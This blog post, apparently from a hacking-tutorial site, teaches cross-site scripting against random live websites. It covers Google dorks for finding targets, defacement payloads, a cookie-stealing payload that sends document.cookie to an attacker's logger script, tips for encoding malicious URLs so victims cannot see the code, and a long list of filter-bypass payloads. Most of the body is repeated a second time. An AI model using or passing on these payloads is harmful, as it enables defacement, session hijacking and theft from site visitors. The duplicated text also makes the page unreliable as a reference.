How to Find XSS Vulnerabilities
Posted by
Unknown
at
2:52 PM
To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.
Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.
Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :
<script>alert("Priyanshu")</script>
now this will alert a popup message, saying "Priyanshu" without quotes.
So,use "search.php?q=" and you can simple try the following on a website with the
same thing,
http://website.com/search.php?q=<script>alert("Priyanshu")</script>
There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>
if you see the bold text on the page and newlines then you knows its vulnerable.
Example:
How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf"
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>
There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)
How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here: How To Make A Cookie Stealer Php script ?
ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D
but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is
')alert('xss');
or
");alert('xss');
that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".
Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc<script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc//abc"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000abc</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=pwned<script>document.write('Priyanshu');</script>
website.com/search.php?q=pwned</script><script>document.write(Priyanshu);</script>
website.com/search.php?q=pwned')alert(Priyanshu);//
website.com/search.php?q=pwned";)alert(Priyanshu);//
website.com/search.php?q=pwned");alert(/Priyanshu/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://malicous js'</script>
Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here
http://www.asciitable.com/
http://easycalculation.com/
This will help you write what you want, In my examples ill be writing "HOC" this is the following code
72 79 67
Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.
String.fromCharCode()
is suitable for this kinda things, its easy to setup, im gona give it my args below.
String.fromCharCode(72, 79, 67)
Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.
<script>alert(String.fromCharCode(72, 79, 67))</script>
For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html
Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.
Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :
<script>alert("Priyanshu")</script>
now this will alert a popup message, saying "Priyanshu" without quotes.
So,use "search.php?q=" and you can simple try the following on a website with the
same thing,
http://website.com/search.php?q=<script>alert("Priyanshu")</script>
There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>
if you see the bold text on the page and newlines then you knows its vulnerable.
Example:
How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf"
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>
There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)
How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here: How To Make A Cookie Stealer Php script ?
ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D
but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is
')alert('xss');
or
");alert('xss');
that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".
Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc<script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc//abc"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000abc</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=pwned<script>document.write('Priyanshu');</script>
website.com/search.php?q=pwned</script><script>document.write(Priyanshu);</script>
website.com/search.php?q=pwned')alert(Priyanshu);//
website.com/search.php?q=pwned";)alert(Priyanshu);//
website.com/search.php?q=pwned");alert(/Priyanshu/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://malicous js'</script>
Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here
http://www.asciitable.com/
http://easycalculation.com/
This will help you write what you want, In my examples ill be writing "HOC" this is the following code
72 79 67
Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.
String.fromCharCode()
is suitable for this kinda things, its easy to setup, im gona give it my args below.
String.fromCharCode(72, 79, 67)
Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.
<script>alert(String.fromCharCode(72, 79, 67))</script>
For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html
0 comments:
Post a Comment